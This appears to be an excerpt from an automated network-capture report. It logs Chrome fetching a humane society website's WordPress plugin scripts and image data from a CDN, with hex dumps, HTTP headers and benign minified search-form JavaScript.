                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 67 81 df 51 4a 9d be c8 c7 13 79 15 13 42 b8 0e 91 eb dc 82 54 f6 0f ef b8 c5 ea fe b9 c3 23 d2 c0 cf 02 bf 0f dc 17 0b 00 91 2b 95 4b f2 ca 1b 89 9c 6f 5a 6f ff 9f 40 36 c7 de ce 25 50 31 13 79 ce 80 b5 d5 35 96 97 9f e7 f8 73 c7 78 fe b9 63 9c 39 79 82 8d 8d 75 c6 e5 04 6f 2d a9 51 2c 2d 2d e2 bc a3 ae 1b 96 96 76 a1 8d e6 ec d9 b3 ac 6f 0e 18 0e 87 d4 55 3d d3 ea 2b ad 18 8d c6 04 6b e9 b6 d5 77 17 1c c1 79 b2 3c 63 71 f7 12 49 9a 52 55 25 f8 80 b7 81 b2 1c 63 14 e0 2c 9d 6e 97 cd a2 64 6b 30 c6 68 03 28 7a 9d 94 7e b7 c3 ea c6 16 26 31 e4 59 8a d1 9a 44 2b b4 52 e4 69 8e f3 0e e7 1a 8a c9 04 a5 13 b4 82 c5 c5 45 ae 3e 78 98 4e 7f 81 5b 6e 3d ca ed 77 dc c1 4d af 7d 1d bb 77 ef c1 7c 8b 99 82 4b 80 11 e2 1a f2 cf 94 52 f7 5d ec 83 89 bc 3a 68 cf 4f 47
                                                                                                                                                                                                                                                        Data Ascii: gQJyBT#+KoZo@6%P1y5sxc9yuo-Q,--voU=+kwy<cqIRU%c,ndk0h(z~&1YD+RiE>xN[n=wM}w|KR]:hOG
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 6f f0 cc d3 4f f2 f4 93 8f b3 bc 7c 8c ba aa 18 8f c7 28 25 c1 fb 68 3c a6 ae 1d 49 a2 21 80 f3 6d c0 9d a5 80 a2 6a 2c 45 d9 e0 ac c7 5a 47 50 52 99 6f ac c3 07 8f 52 0a a3 8d 74 0c 5a ff ff 34 cd d0 1a ca aa 46 6b c8 d2 94 c4 68 14 1a e7 e5 79 b5 92 bd 00 4a 69 02 1e 17 3c 79 db 45 a8 cb 9a c6 5a d2 2c c7 18 43 5d 95 18 ad 08 de b7 9e fe 09 89 31 a4 59 42 37 cf 31 46 33 1c 8d a8 9b a6 5d 10 a6 b0 8d 43 01 bd 5e 97 5d 4b bb b0 d3 ce 86 49 c8 f2 0e 45 31 86 10 58 5a 5c a0 93 77 39 70 e0 00 ce 07 8a c9 98 c9 a4 c4 07 cf 60 6b 8b aa 9c 70 cd 91 c3 fc d0 bb df c3 d1 a3 6f e6 96 5b 8f 72 f8 c8 b5 97 8a 8d e8 08 f8 1c f0 5b c0 d7 be 9d 24 28 84 90 20 da ee 12 58 8d d2 a1 57 17 21 84 05 24 f0 ff 38 e2 36 f6 1a 5e c5 db c5 43 08 84 10 f0 de 53 57 35 1b 9b 9b 0c
                                                                                                                                                                                                                                                        Data Ascii: oO|(%h<I!mj,EZGPRoRtZ4FkhyJi<yEZ,C]1YB71F3]C^]KIE1XZ\w9p`kpo[r[$( XW!$86^CSW5
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 3c cf 49 92 84 da 3a 26 c5 84 ba ae 5a 69 4f 4a d3 34 d4 95 58 1c 77 ba 39 69 9a b5 e7 15 85 36 90 18 83 6d 2c 55 5d 91 25 99 cc 0a f5 fa 5c 7d f0 10 d7 df 78 03 47 8f be 91 1f 38 7a 94 bd 7b f6 a2 2f cc 5e 91 1a f8 22 f0 db c8 f6 e0 98 04 44 2e 1b 62 02 10 b9 a2 08 21 dc 8a 0c fb 7e 84 f3 7c 11 1e 8f 46 7c f6 33 7f c6 17 3f ff 97 9c 3a 75 82 b3 6b eb 14 45 41 d3 38 b4 32 04 2d 95 75 09 92 6b 46 a3 09 55 5d 63 ad 93 20 58 81 49 12 52 63 64 d8 d7 5a ac f7 38 eb 48 92 04 63 0c de b9 59 2b 5d 69 25 5a ff 69 40 df 0e e3 7a ef 67 15 fd e9 f7 ac b5 b3 9f 03 66 15 f2 34 49 51 4a d1 d8 06 e7 3d 84 80 d6 7a 16 dc 4f ef af 66 89 44 78 49 c2 e0 db 39 00 ad 35 de 39 68 9f 73 fa b3 b3 63 6d ef b3 f3 98 d2 2c 6d bf f6 a8 00 5a 69 9c 6f 03 02 63 30 4a 71 f0 ea 03 74 bb
                                                                                                                                                                                                                                                        Data Ascii: <I:&ZiOJ4Xw9i6m,U]%\}xG8z{/^"D.b!~|F|3?:ukEA82-ukFU]c XIRcdZ8HcY+]i%Zi@zgf4IQJ=zOfDxI959hscm,mZioc0Jqt
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 5f 3c c1 5f df f5 45 ee bd fb 4b 6c 6c ac 53 8c c7 6c 6c 6c 32 98 14 54 b5 a5 a9 1b 9c 0f 94 65 89 0d 1e a3 35 ce 79 ac 93 e1 38 05 e2 ed ef 44 d6 e2 bd 6f 35 f6 a2 7d f5 6d 20 2d 92 9c ed 81 60 a3 94 f8 f0 a3 98 94 25 4d bb 99 d7 68 09 f2 95 f2 ed 46 5e e9 20 24 89 c1 24 0a 5b 3b 1a 6b d1 ad a3 90 75 6e e6 e6 33 4d 34 92 c4 a0 82 54 f5 41 82 7b 63 0c 4d d3 10 80 24 69 93 88 1d 03 ca b3 8f b3 21 e2 80 6a 25 46 3b 13 8a 9d 1f bf dd ef 75 9a 24 c8 eb 36 cc f5 fa f4 ba 1d ba 9d 0c 93 68 e6 e7 e6 b1 4d 83 6d 1c 83 d1 88 34 35 cc f5 ba 5c b5 f7 2a 99 35 c0 01 01 8f e2 85 13 2f 52 37 a2 98 09 3e b0 d0 ef f1 f6 db df cc 4d 6f 78 13 a7 4e 9d e1 96 5b 6e e1 e8 9b 6e 63 d7 9e bd ec d9 bb 97 6e b7 7b 39 76 07 be 5b 4e 20 2e 25 ff 09 99 2d 58 89 c3 c5 df 1d ed 39 e5
                                                                                                                                                                                                                                                        Data Ascii: _<_EKllSlll2Te5y8Do5}m -`%MhF^ $$[;kun3M4TA{cM$i!j%F;u$6hMm45\*5/R7>MoxN[nncn{9v[N .%-X9
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 5a 31 df eb d0 eb e4 a4 49 4a ed a4 23 99 67 19 55 55 61 ad c5 b6 89 80 74 4f 45 b6 14 bc 23 00 b5 6b 66 b6 c8 a9 36 1c d8 bf 8f f7 be ef fd fc f4 cf fe 3c 37 dc 74 f3 f9 74 0f 7b 06 f8 87 4a a9 cf 9d af 27 88 44 5e 09 97 bd 6f 5e e4 d5 49 08 e1 08 f0 3f 22 03 79 e7 3c f8 0f 21 70 ea e4 49 3e f3 a7 ff 81 fb ef 15 7b cf ba 2a 29 8b 12 57 5b 5c e3 a9 cb 1a 17 e4 42 93 6a f0 1a d0 12 e4 5a 17 70 1e 94 0f 28 6d 30 2a c8 41 ee 18 ba 9d 62 12 43 9a a4 48 80 0e 89 92 6d c0 4a c9 c0 5b 53 5b dc 74 00 4e 4d 03 f1 1d c5 db 36 e8 97 60 5a cd 86 e5 d2 24 91 f6 ba b5 ad 34 28 65 67 8c 1b c2 74 98 b7 1d 2e 0e 0a e7 1d 75 23 9d 8f e0 43 eb aa 93 e3 7d 60 52 96 ed e6 61 b9 c8 1a 6d e8 a4 29 a0 db 8a 9b 45 02 fc 69 42 22 b3 0d db c7 aa 5e d2 15 78 c9 1e 02 ef d1 68 1c 9e
                                                                                                                                                                                                                                                        Data Ascii: Z1IJ#gUUatOE#kf6<7tt{J'D^o^I?"y<!pI>{*)W[\BjZp(m0*AbCHmJ[S[tNM6`Z$4(egt.u#C}`Ram)EiB"^xh
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 49 c8 f3 1c a3 35 d6 7a ea aa 41 69 19 b5 b5 d6 12 bc a7 df eb b1 67 ef 6e ca b2 e2 ec d9 0d 19 36 d6 b0 73 a6 60 a7 0b 90 54 ea c4 36 74 67 c0 bf fd b5 74 21 b4 31 e8 56 42 24 2e 48 1a 15 60 ae df a3 df eb e3 9c a7 b6 56 02 17 6b d9 bd 7b 91 4e 37 a7 ae 2d c5 48 5e 8b f3 8e 6e 9e b1 6b 71 9e 6b af bd 96 62 34 62 f9 d4 09 46 45 49 5d 59 40 93 77 b3 d6 1a 55 a3 54 60 a1 d7 63 61 7e 9e 8f fd ec 2f f0 91 8f fd 0c 57 5d 7d f5 95 b0 58 ec 7c 30 ad ba 5b 44 e7 fc 28 db 9d 83 db 91 60 7d 19 99 3b 78 bc fd 37 8f 04 e1 8b 48 80 3f b5 62 3a 88 c8 f7 16 5e f6 1c fa db 7c 9c 3e ff cb 3b 7e d3 63 7a f9 fd 5f fe bd cb ca b5 67 ea c0 b3 b5 39 60 79 79 99 fb ef bf 9f af de fd 55 4e 9c 78 9e e0 3d de 79 d2 34 a1 d7 4d 99 ef cf 91 e7 1d ca aa 6a df 4a 9e 5d bb 77 89 ed ae
                                                                                                                                                                                                                                                        Data Ascii: I5zAign6s`T6tgt!1VB$.H`Vk{N7-H^nkqkb4bFEI]Y@wUT`ca~/W]}X|0[D(`};x7H?b:^|>;~cz_g9`yyUNx=y4MjJ]w
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 2e ef 1b dc 74 6f 40 08 a4 ed 86 74 67 2d 75 53 b7 05 08 8b 6a 77 a6 a8 d6 05 4d 16 24 ca 39 c9 39 49 fa 51 6a c7 63 33 3b ff 05 1f 28 ab 9a c7 1f 7f 0c df 34 5c 7b dd f5 2c 2c 2e 9c 6b 53 80 04 b8 16 59 1c f7 e4 af ff fa af 9f f9 c4 27 3e 71 2e 1f 3f 12 f9 9e 89 3d ee c8 65 41 08 e1 3a 64 cb ef fb cf f5 63 bf 78 e2 05 ee bf ef af b9 eb ae 2f f1 d0 43 0f 31 d8 d8 c4 68 18 4f 4a 06 a3 31 8a 40 08 8a 49 55 13 bc 5c b8 9c 0f 14 75 43 6d 1d 21 a8 76 28 cd cc 2e 56 c6 88 97 b5 86 d6 fd 42 2a 62 46 6b b4 91 16 b8 77 8e 24 4d f1 0a 9a a6 86 a0 70 3e 60 ad 38 e9 78 b6 93 81 e0 fd cc bd c7 35 cd df b0 e3 94 44 80 d6 df db cd fe 5d aa 6a 66 56 75 6b 9a e6 25 17 eb ed ad bc a1 d5 ce 6e 3f 66 96 a5 6d 95 bf 9e 75 06 24 60 df 4e 66 5a 63 a1 59 57 61 ba b0 0c da 39 86
                                                                                                                                                                                                                                                        Data Ascii: .to@tg-uSjwM$99IQjc3;(4\{,,.kSY'>q.?=eA:dcx/C1hOJ1@IU\uCm!v(.VB*bFkw$Mp>`8x5D]jfVuk%n?fmu$`NfZcYWa9
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: cc d2 d4 87 30 b3 19 4d f3 1c 94 62 71 69 91 f5 f5 75 26 45 41 c8 12 fa bd 2e ce 39 06 83 2d 9e 3b f6 0c ff c7 bf fd df 78 f0 be 7b f9 f8 7f fd 73 5c 7f e3 cd 24 c9 77 ae 0a 4e 6d 51 b5 12 1b d6 e1 60 8b 24 49 99 9b 9f 3f d7 55 c5 c8 65 c0 74 a0 b7 ae 6b d6 d7 d6 f8 e6 37 bf c9 13 8f 3f ce d3 cf 3c 4d 63 6b f2 3c 63 34 1a 92 65 69 5b 8d 96 ce e3 ae 25 09 f2 d3 24 65 30 1a b1 b4 30 47 d3 fe fd 26 5a 51 5a c7 e6 d6 26 76 02 c3 49 cd d6 d6 16 e5 62 97 24 28 b0 8e 6a 52 a2 93 84 8d cd 4d c6 93 02 a3 0d 55 d5 d0 34 8e e0 ab 99 24 67 67 a1 22 78 d5 56 f3 15 29 9a d1 68 8c 0b 43 9a a6 41 01 59 96 11 02 64 79 67 47 b7 73 7b 13 78 bd c3 8e 74 fa da 41 66 9e 94 52 db 9d 82 56 d4 68 8c 41 07 83 f3 a2 d9 f7 de b5 ee 67 d0 58 99 73 b0 5e e6 95 3c d2 59 1c 34 5b 98 5d
                                                                                                                                                                                                                                                        Data Ascii: 0Mbqiu&EA.9-;x{s\$wNmQ`$I?Uetk7?<Mck<c4ei[%$e00G&ZQZ&vIb$(jRMU4$gg"xV)hCAYdygGs{xtAfRVhAgXs^<Y4[]


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        65192.168.2.449819192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC628OUTGET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/search-form.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC672INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:13 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 9956
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/search-form.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 01:15:24 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC697INData Raw: 28 28 29 3d 3e 7b 76 61 72 20 65 3d 7b 36 39 31 35 38 3a 65 3d 3e 7b 76 6f 69 64 20 30 3d 3d 3d 54 43 42 5f 46 72 6f 6e 74 2e 6a 73 5f 6d 6f 64 75 6c 65 73 5b 22 73 65 61 72 63 68 2d 66 6f 72 6d 22 5d 26 26 54 43 42 5f 46 72 6f 6e 74 2e 73 65 74 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 53 74 61 74 75 73 28 22 73 65 61 72 63 68 2d 66 6f 72 6d 22 2c 21 31 29 2c 28 28 74 2c 69 29 3d 3e 7b 69 66 28 54 43 42 5f 46 72 6f 6e 74 2e 69 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 28 22 73 65 61 72 63 68 2d 66 6f 72 6d 22 29 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 73 3d 22 2e 74 68 72 76 2d 73 65 61 72 63 68 2d 66 6f 72 6d 22 2c 61 3d 65 3d 3e 7b 74 72 79 7b 6e 65 77 20 6e 28 74 28 65 29 2c 21 21 54 43 42 5f 46 72 6f 6e 74 2e 55 74 69 6c 73 2e 69 73 45 64 69 74 6f 72 50 61
                                                                                                                                                                                                                                                        Data Ascii: (()=>{var e={69158:e=>{void 0===TCB_Front.js_modules["search-form"]&&TCB_Front.setModuleLoadedStatus("search-form",!1),((t,i)=>{if(TCB_Front.isModuleLoaded("search-form"))return;const s=".thrv-search-form",a=e=>{try{new n(t(e),!!TCB_Front.Utils.isEditorPa
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 74 6f 72 3d 74 2c 74 68 69 73 2e 24 69 6e 70 75 74 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 74 68 72 76 2d 73 66 2d 69 6e 70 75 74 2d 68 69 64 65 22 29 2c 74 68 69 73 2e 6f 6e 52 65 73 69 7a 65 28 29 2c 74 68 69 73 2e 69 73 45 64 69 74 6f 72 3f 74 68 69 73 2e 24 66 6f 72 6d 2e 6f 66 66 28 22 73 75 62 6d 69 74 22 29 2e 6f 6e 28 22 73 75 62 6d 69 74 22 2c 28 28 29 3d 3e 21 31 29 29 3a 74 68 69 73 2e 62 69 6e 64 45 76 65 6e 74 73 28 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 61 74 74 72 28 22 69 64 22 29 26 26 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 61 74 74 72 28 22 64 61 74 61 2d 73 65 6c 65 63 74 6f 72 22 2c 60 24 7b 73 7d 23 24 7b 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 61 74 74 72 28 22 69 64 22 29 7d 60 29 2c 65 2e 64 61 74 61 28 22 74 63 62
                                                                                                                                                                                                                                                        Data Ascii: tor=t,this.$input.removeClass("thrv-sf-input-hide"),this.onResize(),this.isEditor?this.$form.off("submit").on("submit",(()=>!1)):this.bindEvents(),this.$element.attr("id")&&this.$element.attr("data-selector",`${s}#${this.$element.attr("id")}`),e.data("tcb
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 6b 3b 63 61 73 65 22 74 6f 6f 6c 74 69 70 2d 63 6c 69 63 6b 22 3a 63 61 73 65 22 74 6f 6f 6c 74 69 70 2d 68 6f 76 65 72 22 3a 74 68 69 73 2e 68 69 64 65 54 6f 6f 6c 74 69 70 28 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 69 2e 69 6e 6c 69 6e 65 43 73 73 56 61 72 69 61 62 6c 65 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2c 22 2d 2d 74 76 65 2d 61 70 70 6c 69 65 64 2d 6d 61 78 2d 77 69 64 74 68 22 2c 22 22 29 2c 69 2e 69 6e 6c 69 6e 65 43 73 73 56 61 72 69 61 62 6c 65 28 74 68 69 73 2e 24 69 6e 70 75 74 2c 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 22 22 2c 74 72 61 6e 73 66 6f 72 6d 3a 22 22 2c 64 69 73 70 6c 61 79 3a 22 62 6c 6f 63 6b 22 7d 29 7d 7d 62 69 6e 64 45 76 65 6e 74 73 28 29 7b 63 6f 6e 73 74 20 65 3d 74 68 69 73 2e 6f 6e 52 65 73 69 7a 65 2e 62 69
                                                                                                                                                                                                                                                        Data Ascii: k;case"tooltip-click":case"tooltip-hover":this.hideTooltip();break;default:i.inlineCssVariable(this.$element,"--tve-applied-max-width",""),i.inlineCssVariable(this.$input,{transition:"",transform:"",display:"block"})}}bindEvents(){const e=this.onResize.bi
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 73 65 65 6e 74 65 72 2e 73 65 61 72 63 68 5f 69 6e 70 75 74 22 29 2e 6f 6e 28 22 6d 6f 75 73 65 65 6e 74 65 72 2e 73 65 61 72 63 68 5f 69 6e 70 75 74 22 2c 28 28 29 3d 3e 7b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 68 69 73 2e 68 69 64 65 49 6e 70 75 74 54 69 6d 65 6f 75 74 29 7d 29 29 2c 74 68 69 73 2e 24 73 75 62 6d 69 74 2e 6f 66 66 28 22 6d 6f 75 73 65 6c 65 61 76 65 2e 73 65 61 72 63 68 22 29 2e 6f 6e 28 22 6d 6f 75 73 65 6c 65 61 76 65 2e 73 65 61 72 63 68 22 2c 65 29 2c 74 68 69 73 2e 24 69 6e 70 75 74 2e 6f 66 66 28 22 6d 6f 75 73 65 6c 65 61 76 65 2e 73 65 61 72 63 68 5f 69 6e 70 75 74 22 29 2e 6f 6e 28 22 6d 6f 75 73 65 6c 65 61 76 65 2e 73 65 61 72 63 68 5f 69 6e 70 75 74 22 2c 65 29 7d 69 73 48 6f 76 65 72 54 6f 6f 6c 74 69 70 28 29 7b 72 65
                                                                                                                                                                                                                                                        Data Ascii: seenter.search_input").on("mouseenter.search_input",(()=>{clearTimeout(this.hideInputTimeout)})),this.$submit.off("mouseleave.search").on("mouseleave.search",e),this.$input.off("mouseleave.search_input").on("mouseleave.search_input",e)}isHoverTooltip(){re
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 6f 6e 2d 64 69 73 70 6c 61 79 22 20 64 61 74 61 2d 73 65 6c 65 63 74 6f 72 3d 22 23 24 7b 65 7d 20 2e 74 63 62 2d 73 66 2d 63 6c 6f 73 65 2d 69 63 6f 6e 22 3e 3c 2f 73 76 67 3e 24 7b 69 2e 69 63 6f 6e 73 2e 67 65 74 28 22 63 72 6f 73 73 22 29 2e 72 65 70 6c 61 63 65 28 22 74 63 62 2d 63 72 6f 73 73 22 2c 22 74 63 62 2d 69 63 6f 6e 20 74 63 62 2d 63 72 6f 73 73 22 29 7d 3c 2f 64 69 76 3e 60 29 3a 73 2e 70 72 65 70 65 6e 64 28 60 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 68 72 76 5f 77 72 61 70 70 65 72 20 74 63 62 2d 73 66 2d 63 6c 6f 73 65 2d 69 63 6f 6e 20 74 68 72 76 5f 69 63 6f 6e 20 74 76 65 5f 6e 6f 5f 64 72 61 67 20 74 76 65 5f 6e 6f 5f 69 63 6f 6e 73 20 74 63 62 2d 69 63 6f 6e 2d 69 6e 68 65 72 69 74 2d 73 74 79 6c 65 20 74 63 62 2d 69 63 6f 6e 2d 64
                                                                                                                                                                                                                                                        Data Ascii: on-display" data-selector="#${e} .tcb-sf-close-icon"></svg>${i.icons.get("cross").replace("tcb-cross","tcb-icon tcb-cross")}</div>`):s.prepend(`<div class="thrv_wrapper tcb-sf-close-icon thrv_icon tve_no_drag tve_no_icons tcb-icon-inherit-style tcb-icon-d
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 72 6c 61 79 5f 73 68 6f 77 22 2c 5b 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 5d 29 7d 68 69 64 65 4f 76 65 72 6c 61 79 28 29 7b 69 2e 24 62 6f 64 79 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 74 63 62 2d 62 6f 64 79 2d 73 65 61 72 63 68 2d 6f 76 65 72 6c 61 79 22 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 64 61 74 61 28 22 24 24 6f 76 65 72 6c 61 79 57 72 61 70 70 65 72 22 29 3f 74 68 69 73 2e 69 73 45 64 69 74 6f 72 3f 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 64 61 74 61 28 22 24 24 6f 76 65 72 6c 61 79 57 72 61 70 70 65 72 22 29 2e 72 65 6d 6f 76 65 28 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 72 65 6d 6f 76 65 44 61 74 61 28 22 24 24 6f 76 65 72 6c 61 79 57 72 61 70 70 65 72 22 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 72 65 6d 6f 76
                                                                                                                                                                                                                                                        Data Ascii: rlay_show",[this.$element])}hideOverlay(){i.$body.removeClass("tcb-body-search-overlay"),this.$element.data("$$overlayWrapper")?this.isEditor?(this.$element.data("$$overlayWrapper").remove(),this.$element.removeData("$$overlayWrapper"),this.$element.remov
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 69 74 69 6f 6e 3f 22 72 69 67 68 74 22 3a 22 6c 65 66 74 22 5d 3a 22 31 30 30 25 22 2c 5b 74 68 69 73 2e 63 75 72 72 65 6e 74 50 6f 73 69 74 69 6f 6e 5d 3a 22 61 75 74 6f 22 7d 29 2c 74 68 69 73 2e 24 69 6e 70 75 74 2e 73 68 6f 77 28 29 2e 61 64 64 43 6c 61 73 73 28 22 74 63 62 2d 73 66 2d 65 78 70 61 6e 64 22 29 2c 74 68 69 73 2e 7a 49 6e 64 65 78 4f 72 64 65 72 28 29 2c 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 68 69 73 2e 68 69 64 65 45 78 70 61 6e 64 54 69 6d 65 6f 75 74 29 2c 74 68 69 73 2e 69 73 4f 70 65 6e 65 64 3d 21 30 7d 68 69 64 65 45 78 70 61 6e 64 28 65 3d 21 31 29 7b 63 6f 6e 73 74 20 74 3d 28 29 3d 3e 7b 69 2e 69 6e 6c 69 6e 65 43 73 73 56 61 72 69 61 62 6c 65 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2c 22 2d 2d 74 76 65 2d 61 70 70 6c 69
                                                                                                                                                                                                                                                        Data Ascii: ition?"right":"left"]:"100%",[this.currentPosition]:"auto"}),this.$input.show().addClass("tcb-sf-expand"),this.zIndexOrder(),clearTimeout(this.hideExpandTimeout),this.isOpened=!0}hideExpand(e=!1){const t=()=>{i.inlineCssVariable(this.$element,"--tve-appli
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1045INData Raw: 74 68 69 73 2e 69 73 4f 70 65 6e 65 64 3d 21 30 7d 68 69 64 65 54 6f 6f 6c 74 69 70 28 29 7b 69 2e 69 6e 6c 69 6e 65 43 73 73 56 61 72 69 61 62 6c 65 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2c 22 2d 2d 74 76 65 2d 61 70 70 6c 69 65 64 2d 6d 61 78 2d 77 69 64 74 68 22 2c 22 22 29 2c 69 2e 69 6e 6c 69 6e 65 43 73 73 56 61 72 69 61 62 6c 65 28 74 68 69 73 2e 24 69 6e 70 75 74 2c 7b 6c 65 66 74 3a 22 22 2c 72 69 67 68 74 3a 22 22 7d 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 74 63 62 2d 73 66 2d 73 68 6f 77 2d 74 6f 6f 6c 74 69 70 22 29 2c 74 68 69 73 2e 7a 49 6e 64 65 78 4f 72 64 65 72 28 21 31 29 2c 74 68 69 73 2e 69 73 4f 70 65 6e 65 64 3d 21 31 7d 69 73 49 6e 70 75 74 48 69 64 64 65 6e 28 29 7b 72 65 74 75 72
                                                                                                                                                                                                                                                        Data Ascii: this.isOpened=!0}hideTooltip(){i.inlineCssVariable(this.$element,"--tve-applied-max-width",""),i.inlineCssVariable(this.$input,{left:"",right:""}),this.$element.removeClass("tcb-sf-show-tooltip"),this.zIndexOrder(!1),this.isOpened=!1}isInputHidden(){retur


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        66192.168.2.449822192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC452OUTGET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/post-list.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC670INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:13 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 3892
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/post-list.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 01:15:24 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
